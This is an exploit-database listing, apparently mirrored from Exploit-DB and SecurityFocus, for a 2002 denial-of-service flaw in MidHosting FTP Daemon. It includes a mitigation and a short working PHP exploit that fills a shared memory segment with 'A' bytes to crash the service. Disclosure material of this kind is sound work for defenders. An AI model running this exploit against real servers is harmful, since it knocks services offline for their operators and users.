header-logo
Suggest Exploit
vendor:
FTP Daemon
by:
SecurityFocus
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: FTP Daemon
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

MidHosting FTP Daemon Denial of Service

It has been reported that MidHosting FTP Daemon does not properly implement shared memory when the m flag (-m) is enabled. Because of this, an attacker could corrupt process memory, causing the service to crash. The exploit code creates a shared memory segment of 16384 bytes and fills it with 'A' characters.

Mitigation:

Disable the m flag (-m) in the configuration of the FTP daemon.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7956/info

It has been reported that MidHosting FTP Daemon does not properly implement shared memory when the m flag (-m) is enabled. Because of this, an attacker could corrupt process memory, causing the service to crash. 

<?php
# mhftpd denial of service

define('SHMSIZE', 16384);

if (($shmid = shmop_open(ftok('/tmp', 'U'), 'w', 0777, SHMSIZE)) == -1) {
die();
}
shmop_write($shmid, str_repeat('A', SHMSIZE), 0);

?>

Navigation

Suggest Exploit

Services By CQR